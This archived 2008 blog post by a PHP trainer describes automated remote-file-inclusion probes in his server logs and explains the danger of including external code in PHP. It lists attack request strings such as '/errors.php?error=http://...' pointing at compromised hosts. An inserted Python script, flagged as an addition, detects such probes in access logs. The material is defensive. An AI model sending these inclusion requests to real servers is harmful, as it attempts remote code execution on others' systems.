For 2023 (and 2024 ...) - we are now fully retired from IT training.
We have made many, many friends over 25 years of teaching about Python, Tcl, Perl, PHP, Lua, Java, C and C++ - and MySQL, Linux and Solaris/SunOS too. Our training notes are now very much out of date, but due to upward compatibility most of our examples remain operational and even relevant and you are welcome to make use of them "as seen" and at your own risk.

Lisa and I (Graham) now live in what was our training centre in Melksham - happy to meet with former delegates here - but do check ahead before coming round. We are far from inactive - rather, enjoying the times that we are retired but still healthy enough in mind and body to be active!

I am also active in many other areas and still look after a lot of web sites - you can find an index ((here))
Are nasty programs looking for security holes on your server?

Looking through my log file reports for the last week, I have found the following in my "failed requests" log.

 546: /errors.php
  52:   /errors.php?error=http://www.beautiful-america.com/admin/id.txt?
  42:   /errors.php?error=http://www.ticarbon.de/phpBB2/files/i?
  32:   /errors.php?error=http://test.iearn.uz/test.iearn.uz/assist.txt???
  27:   /errors.php?error=http://www.dg-mitteldeutschland.de/sys_crank/i?
  26:   /errors.php?error=http://hornydate.co.uk/sparky.txt??
  25:   /errors.php?error=http://www.sternkinder2007.de/video/lol?


So what are these requests? Should I be worried?

They're attempts to break into my system. But I'm not being particularly targeted - this is an automated attack, attempting to call a script (which I don't have) in order to run code that's held on those remote sites, which have previously been compromised. And if they succeed, then they'll set the same hole up on my system and carry on to the next.

The particular accesses above actually don't worry me - they were all "404"d - but rather they form a warning of the dangers of allowing external code to be included in PHP.
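To produce this kind of report from your own access log, the following Python script (an added example, not part of the original article) lists every request in which a query parameter's value is itself a remote URL, tallies them per script and parameter, and separates out the ones that were not refused. The log lines, host names, script names and function names are all constructed for illustration, and the Apache "combined" log format is an assumption.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

# Constructed sample (Apache combined log format); hosts and script names are placeholders.
SAMPLE_LOG = """\
203.0.113.7 - - [17/Feb/2008:03:12:01 +0000] "GET /errors.php?error=http://compromised.example/admin/id.txt? HTTP/1.1" 404 209 "-" "libwww-perl/5.805"
203.0.113.7 - - [17/Feb/2008:03:12:02 +0000] "GET /errors.php?error=http://other-host.example/files/i? HTTP/1.1" 404 209 "-" "libwww-perl/5.805"
198.51.100.23 - - [17/Feb/2008:04:40:10 +0000] "GET /view.php?page=http%3A%2F%2Fcompromised.example%2Fi%3F HTTP/1.1" 200 5120 "-" "libwww-perl/5.805"
192.0.2.44 - - [17/Feb/2008:09:15:30 +0000] "GET /search.php?q=php+include HTTP/1.1" 200 8841 "-" "Mozilla/5.0"
192.0.2.44 - - [17/Feb/2008:09:15:42 +0000] "GET /redirect.php?to=/courses/php.html HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) [^"]*" (\d{3}) ')
REMOTE_URL = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)

def find_rfi_probes(log_text):
    """Return (path, parameter, remote_url, status) for each URL-valued parameter."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST.search(line)
        if not match:
            continue  # not a request line we understand
        parts = urlsplit(match.group(1))
        status = int(match.group(2))
        # parse_qsl percent-decodes, so http%3A%2F%2F... is caught as well
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if REMOTE_URL.match(value):
                hits.append((parts.path, name, value, status))
    return hits

def tally(hits):
    """Count probes per (script, parameter), like the weekly report above."""
    return Counter((path, name) for path, name, _, _ in hits)

def served(hits):
    """Probes that did NOT fail: the script exists, so check how it uses the parameter."""
    return [h for h in hits if h[3] < 400]

if __name__ == "__main__":
    hits = find_rfi_probes(SAMPLE_LOG)
    for (path, name), count in tally(hits).most_common():
        print(f"{count:5d}: {path}?{name}=<remote URL>")
    for path, name, url, status in served(hits):
        print(f"REVIEW {path} ({name}) answered {status}")
```

A probe that got a 404 only tells you the scanner passed by; one that was answered with a 2xx or 3xx means the named script exists and its handling of that parameter is worth reading.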

Visiting the URLs given as the "error=" parameter, I find a variety of "not found" pages which means that the hole has not been closed on the remote system, and nasty pieces of PHP which mean that the remote machine is still compromised. (If you, reading this article, visit any of them you should get a 404 as I have distorted the URLs that were live - I don't want to make this into a "how to break in" manual page!). But I do have copies of the scripts that I can show bona fide delegates on our PHP courses, and of the further log details of the programs (often in Perl) that are injected.

If you are worried about being infected, the particular attack file contains the string "Mic22" - so if you search for that ...
(written 2008-02-17, updated 2008-02-18)

 
Associated topics are indexed as below, or enter http://melksh.am/nnnn for individual articles
H117 - Security in PHP
  [345] Spotting a denial of service attack - (2005-06-12)
  [426] Robust checking of data entered by users - (2005-08-27)
  [920] A lion in a cage - PHP - (2006-11-10)
  [947] What is an SQL injection attack? - (2006-11-27)
  [1052] Learning to write secure, maintainable PHP - (2007-01-25)
  [1086] Injection attacks - safeguard your PHP scripts - (2007-02-20)
  [1323] Easy handling of errors in PHP - (2007-08-27)
  [1387] Error logging to file not browser in PHP - (2007-10-11)
  [1396] Using PHP to upload images / Store on MySQL database - security questions - (2007-10-19)
  [1482] A story about benchmarking PHP - (2007-12-23)
  [1679] PHP - Sanitised application principles for security and useability - (2008-06-16)
  [1694] Defensive coding techniques in PHP? - (2008-07-02)
  [1747] Who is watching you? - (2008-08-10)
  [1779] Injection Attacks - avoiding them in your PHP - (2008-08-31)
  [2025] Injection Attack if register_globals in on - PHP - (2009-02-04)
  [2628] An example of an injection attack using Javascript - (2010-02-08)
  [2688] Security considerations in programming - what do we teach? - (2010-03-22)
  [2939] Protecting your images from use out of context - (2010-08-29)
  [3210] Catchable fatal error in PHP ... How to catch, and alternative solutions such as JSON - (2011-03-22)
  [3698] How to stop forms on other sites submitting to your scripts - (2012-04-15)
  [3747] An easy way to comply with the new cookie law if your site is well designed - (2012-06-02)
  [3813] Injection Attacks - PHP, SQL, HTML, Javascript - and how to neutralise them - (2012-07-22)
  [4642] A small teaching program - demonstration of principles only - (2016-02-08)




This is a page archived from The Horse's Mouth at http://www.wellho.net/horse/ - the diary and writings of Graham Ellis. Every attempt was made to provide current information at the time the page was written, but things do move forward in our business - new software releases, price changes, new techniques. Please check back via our main site for current courses, prices, versions, etc - any mention of a price in "The Horse's Mouth" cannot be taken as an offer to supply at that price.


© WELL HOUSE CONSULTANTS LTD., 2024: 48 Spa Road • Melksham, Wiltshire • United Kingdom • SN12 7NY
PH: 01144 1225 708225 • EMAIL: info@wellho.net • WEB: http://www.wellho.net • SKYPE: wellho

PAGE: http://www.wellho.info/mouth/1542_Are ... rver-.html • PAGE BUILT: Sun Oct 11 16:07:41 2020 • BUILD SYSTEM: JelliaJamb